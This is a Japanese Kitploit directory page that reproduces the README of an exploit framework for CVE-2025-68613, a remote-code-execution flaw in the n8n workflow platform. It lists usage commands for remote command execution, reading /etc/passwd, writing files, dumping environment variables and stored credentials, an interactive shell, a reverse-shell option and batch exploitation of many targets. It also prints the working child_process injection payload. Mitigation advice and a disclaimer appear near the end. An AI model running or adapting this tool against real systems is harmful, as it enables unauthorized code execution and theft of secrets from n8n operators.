Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ ワークフロー自動化 リモートコード実行 | Kitploit
ツール/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロール学習と教育レッドチーミング
リモートアクセスツール
ペイロード開発
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ ワークフロー自動化 リモートコード実行

リポジトリを見る
5328ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

n8n God Mode Ultimate - CVE-2025-68613 スキャナー & エクスプロイトフレームワーク

n8n God Mode Ultimate

n8n ワークフロー自動化向け高度 RCE スキャナー & エクスプロイトツール

Python Version License CVE CVSS Score


🎯 概要

n8n God Mode Ultimate は、n8n ワークフロー自動化プラットフォームにおける CVE-2025-68613 を検出・検証するための包括的なセキュリティテストフレームワークです。この深刻なリモートコード実行 (RCE) 脆弱性は、ワークフロー実行コンテキストでの式インジェクションを通じて、特定の n8n バージョンに影響を与えます。

CVE-2025-68613 の詳細

  • CVSS スコア: 10.0 (Critical)
  • 攻撃ベクトル: ネットワーク
  • 攻撃の複雑さ: 低
  • 必要な権限: 低 (有効な認証情報)
  • ユーザー操作: 不要
  • 脆弱性の種類: 式インジェクション → リモートコード実行

影響を受けるバージョン:

  • n8n >= 0.211.0 かつ < 1.120.4
  • n8n >= 1.121.0 かつ < 1.121.1

修正済みバージョン:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ 機能

🔍 検出 & スキャン

  • インテリジェントバージョン検出 - サインインページのメタデータから n8n バージョンを抽出
  • バッチスキャン - マルチスレッドによる同時ターゲットスキャンと進捗追跡
  • 複数のスキャンモード:
    • --detect - バージョン検出のみ (最速、非侵入的)
    • --safe - エクスプロイトなしの安全な脆弱性チェック
    • --poc - RCE 概念実証検証
    • --exploit - 完全エクスプロイトモード

💣 エクスプロイト機能

  • 4つのエクスプロイト手法:
    1. スケジュールトリガー - 自動実行ワークフロー (最も信頼性が高い)
    2. Webhook トリガー - HTTP トリガーによる実行
    3. コードノード - 子プロセスへの直接アクセス
    4. 式インジェクション - 手動式実行

🎮 God Mode 機能

  • 対話型シェル - コマンド履歴付き完全リモートシェル
  • ファイル操作:
    • read <ファイル> - リモートファイルの読み取り
    • write <ファイル> <内容> - ターゲットにファイルを書き込み
  • 環境変数抽出 - すべての環境変数をダンプ
  • システム情報 - OS 詳細、ネットワーク設定、プロセス情報
  • リバースシェル - オプションのリバースシェルペイロード生成
  • コマンド履歴 - 内蔵履歴追跡

📊 高度な機能

  • 認証情報の列挙 - API 経由で保存された認証情報を抽出
  • ワークフローダンプ - メタデータ付きですべてのワークフローをエクスポート
  • 設定抽出 - システム設定の完全ダンプ
  • ユーザー列挙 - すべての n8n ユーザーを一覧表示
  • 実行ログ分析 - ワークフロー実行からのコマンド出力を解析
  • 自動クリーンアップ - 実行後にワークフローを削除 (オプション)

🚀 インストール

前提条件

root@kitploit:~
# Python 3.8 以上
python3 --version

# pip パッケージマネージャー
pip3 --version

依存関係のインストール

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# 必要なパッケージをインストール
pip3 install -r requirements.txt

要件

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 使用法

基本的な使用法

root@kitploit:~
# ヘルプメニューの表示
python3 n8n-godmode-ultimate.py -h

# n8n バージョンの検出 (非侵入的)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# 安全な脆弱性チェック
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# RCE 概念実証
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# 完全エクスプロイト
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

God Mode 操作

root@kitploit:~
# 単一コマンドの実行
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# リモートファイルの読み取り
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# リモートファイルの書き込み
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# 環境変数の抽出
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# 対話型シェル
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

バッチスキャン

root@kitploit:~
# ファイルから複数ターゲットをスキャン
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# バッチエクスプロイト
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt の形式:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

対話型シェル コマンド

シェルモード (--shell) に入ると:

root@kitploit:~
n8n> whoami              # コマンドの実行
n8n> read /etc/passwd    # ファイルの読み取り
n8n> env                 # 環境変数の表示
n8n> info                # システム情報
n8n> history             # コマンド履歴
n8n> exit                # シェルを終了

🛠️ コマンドラインオプション

ターゲットオプション

root@kitploit:~
-u, --url URL             ターゲット n8n URL
-l, --list FILE           ターゲット URL が記載されたファイル
-t, --threads NUM         バッチスキャンのスレッド数 (デフォルト: 10)

認証

root@kitploit:~
-e, --email EMAIL         n8n ユーザーメールアドレス
-p, --password PASS       n8n ユーザーパスワード

スキャンモード

root@kitploit:~
--detect                  バージョン検出のみ (最速)
--safe                    エクスプロイトなしの安全なチェック
--poc                     RCE 概念実証
--exploit                 完全エクスプロイトモード

God Mode

root@kitploit:~
--god                     God Mode を有効化
--cmd COMMAND             単一コマンドの実行
--read-file PATH          リモートファイルの読み取り
--write-file PATH         リモートファイルの書き込み
--content DATA            書き込み操作の内容
--dump-env                すべての環境変数を抽出
--shell                   対話型シェルモード
--revshell HOST:PORT      リバースシェルペイロード

エクスプロイトオプション

root@kitploit:~
--mode MODE               エクスプロイトモード: schedule|webhook|code|expression (デフォルト: schedule)
--timeout SEC             コマンドタイムアウト (秒) (デフォルト: 30)
--cleanup                 実行後にワークフローを削除
-k, --insecure           SSL 検証を無効化
-v, --verbose            詳細出力
-q, --quiet              最小限の出力

🔬 技術的詳細

エクスプロイト手法

1. スケジュールトリガー (推奨)

3秒ごとに自動実行されるスケジュールトリガーを持つワークフローを作成します。最も信頼性の高い方法です。

root@kitploit:~
ペイロード: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Webhook トリガー

トリガー時にコマンドを実行する HTTP Webhook エンドポイントを作成します。

3. コードノード

子プロセスにアクセスできるコードノードに直接コードを注入します。

4. 式インジェクション

n8n の式評価システムを介した手動実行。

バージョン検出

サインインページの base64 エンコードされた Sentry 設定からバージョンを抽出します:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

使用される API エンドポイント

  • /rest/login - 認証
  • /rest/workflows - ワークフロー CRUD 操作
  • /rest/credentials - 認証情報の列挙
  • /rest/executions - 実行ログの取得
  • /rest/users - ユーザー列挙
  • /rest/settings - システム設定

📊 出力例

バージョン検出

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] ターゲット: https://target.example.com
[✓] n8n バージョン: 1.36.1
[!] ステータス: 脆弱 (< 1.120.4)

RCE 概念実証

root@kitploit:~
[*] 認証成功
[*] エクスプロイトワークフローを作成中...
[*] ワークフロー ID: hd6LxSY765WBThqd
[*] コマンド実行中: whoami
[✓] コマンドが正常に実行されました!
[+] 出力: root

対話型シェル

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] 環境変数:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ 防御策

即時対応

  1. 修正済みバージョンにアップグレード (>= 1.120.4 または >= 1.121.1)
  2. デフォルト認証情報を無効化 ([email protected]:admin)
  3. 強力な認証を導入 (MFA 推奨)
  4. ネットワークセグメンテーション - n8n インスタンスへのアクセスを制限
  5. ワークフローの監査 - すべてのアクティブなワークフローを確認
  6. 実行ログの監視 - 不審なアクティビティを確認

長期的な強化

  • 監査ログを有効化
  • IP ホワイトリストを導入
  • OAuth/SSO 認証を使用
  • 定期的なセキュリティ評価
  • n8n を最新に保つ
  • 保存データの暗号化
  • 安全な認証情報ストレージ
  • ネットワークトラフィックの監視

⚠️ 法的免責事項

認可されたセキュリティテスト専用

このツールは教育目的および認可されたセキュリティテストのために提供されています。ユーザーはすべての適用される法律および規制を遵守する必要があります。

⚖️ 法的要件

必須事項:

  • ✅ テスト前に書面による許可を取得する
  • ✅ 所有しているシステムまたはテスト許可があるシステムでのみ使用する
  • ✅ 責任ある情報開示の慣行に従う
  • ✅ 適用される法律および規制を遵守する
  • ✅ 防御的なセキュリティ目的で使用する

禁止事項:

  • ❌ 明示的な許可なしにシステムをテストする
  • ❌ 悪意のある目的で使用する
  • ❌ サービス拒否攻撃を実行する
  • ❌ 許可なくデータを流出または変更する
  • ❌ 同意なしに本番システムに展開する

📜 責任

著者はこのツールの誤用に対する一切の責任を負いません。コンピュータシステムへの不正アクセスは、以下の法律で違法とされています:

  • コンピュータ詐欺及び悪用防止法 (CFAA) - 米国
  • コンピュータ不正使用法 - 英国
  • EU サイバー犯罪指令
  • 世界中の同様の法律

自己責任で使用してください。あなたの行動に責任を持つのはあなた自身です。


🤝 貢献

コントリビューションは歓迎します!以下のガイドラインに従ってください:

  1. リポジトリをフォークする
  2. 機能ブランチを作成する (git checkout -b feature/improvement)
  3. 変更をコミットする (git commit -am '新機能を追加')
  4. ブランチにプッシュする (git push origin feature/improvement)
  5. プルリクエストを作成する

行動規範

  • 責任ある情報開示の慣行に従う
  • セキュリティ機能を明確に文書化する
  • 適切なエラーハンドリングを含める
  • 複雑なロジックにはコメントを追加する
  • 提出前に徹底的にテストする

📚 参考文献

CVE 情報

  • CVE-2025-68613 - NVD
  • n8n セキュリティ勧告

n8n ドキュメント

  • n8n 公式ドキュメント
  • n8n API リファレンス
  • n8n セキュリティベストプラクティス

セキュリティ研究

  • 式インジェクション脆弱性
  • ワークフロー自動化セキュリティ

👨‍💻 著者

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • Webサイト: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています - 詳細は LICENSE ファイルを参照してください。

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 謝辞

  • 素晴らしいワークフロー自動化プラットフォームを構築した n8n チーム
  • n8n コミュニティのセキュリティ研究者
  • このプロジェクトに影響を与えたオープンソースのセキュリティツール

📞 サポート

セキュリティ問題については、責任を持って報告してください:

  • セキュリティ問題: 非公開のセキュリティアドバイザリを開く
  • バグ報告: GitHub Issues を使用
  • 機能リクエスト: GitHub Discussion を開く

役に立った場合は、このリポジトリに ⭐ を付けてください!

セキュリティ研究者がセキュリティ研究者のために 💻 で作りました

ツールをダウンロード